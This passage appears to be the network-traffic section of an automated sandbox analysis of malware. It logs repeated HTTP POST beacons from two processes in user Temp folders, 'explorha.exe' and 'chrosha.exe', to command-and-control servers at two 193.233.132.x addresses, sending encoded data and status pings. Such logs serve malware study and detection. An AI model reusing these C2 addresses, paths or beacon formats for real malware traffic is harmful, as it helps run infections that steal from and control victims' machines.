                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:40.137111902 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
584 | 192.168.2.5 | 50429 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:39.945732117 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:40.202685118 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
585 | 192.168.2.5 | 50430 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:40.491050005 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:40.736274004 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
586 | 192.168.2.5 | 50432 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:40.572861910 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:40.827579021 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
587 | 192.168.2.5 | 50433 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:40.987406015 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:41.240036011 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
588 | 192.168.2.5 | 50434 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:41.183685064 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:41.434560061 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
589 | 192.168.2.5 | 50435 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:41.593307018 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:41.832588911 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
590 | 192.168.2.5 | 50436 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:41.692735910 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:41.942235947 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
591 | 192.168.2.5 | 50437 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:42.081496000 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:42.331964970 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
592 | 192.168.2.5 | 50438 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:42.298578024 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:42.540313005 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
593 | 192.168.2.5 | 50439 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:42.692826986 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:42.937803030 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
594 | 192.168.2.5 | 50440 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:42.790445089 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:43.039764881 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
595 | 192.168.2.5 | 50441 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:43.187181950 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:43.439666033 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
596 | 192.168.2.5 | 50442 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:43.417484999 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:43.666038990 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
597 | 192.168.2.5 | 50443 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:43.806570053 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:44.052470922 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
598 | 192.168.2.5 | 50444 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:43.921329975 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:44.171013117 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
599 | 192.168.2.5 | 50445 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:44.299585104 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:44.547992945 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
600 | 192.168.2.5 | 50446 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:44.521615028 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
